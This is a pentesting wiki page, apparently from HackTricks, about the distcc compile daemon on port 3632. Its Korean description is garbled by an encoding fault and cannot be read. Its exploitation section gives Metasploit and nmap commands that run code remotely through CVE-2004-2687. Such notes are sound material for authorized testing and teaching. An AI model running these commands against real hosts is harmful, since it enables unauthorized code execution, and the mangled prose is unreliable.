{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
# κΈ°λ³Έ μ 보
**Distcc**λ λ€νΈμν¬μ λ€λ₯Έ μ»΄ν¨ν°μ **μ ν΄ μ²λ¦¬ λ₯λ ₯**μ νμ©νμ¬ **μ»΄νμΌ νλ‘μΈμ€**λ₯Ό ν₯μμν€λ λꡬμ
λλ€. **distcc**κ° λ¨Έμ μ μ€μ λλ©΄, μ΄ λ¨Έμ μ λ€λ₯Έ μμ€ν
μ **μ»΄νμΌ μμ
**μ λΆλ°°ν μ μμ΅λλ€. μ΄ μμ μμ€ν
μ **distccd λ°λͺ¬**μ΄ μ€ν μ€μ΄μ΄μΌ νλ©°, μ μ‘λ μ½λλ₯Ό μ²λ¦¬ν μ μλ **νΈν κ°λ₯ν μ»΄νμΌλ¬**κ° μ€μΉλμ΄ μμ΄μΌ ν©λλ€.
**κΈ°λ³Έ ν¬νΈ:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Exploitation
**CVE-2004-2687**μ μ·¨μ½νμ§ νμΈνμ¬ μμ μ½λλ₯Ό μ€νν©λλ€:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_μ΄ μλΉμ€λ shodanμ΄ νμ§νμ§ μλ κ² κ°μ΅λλ€._
# Resources
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Γlex B (@r1p)**
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}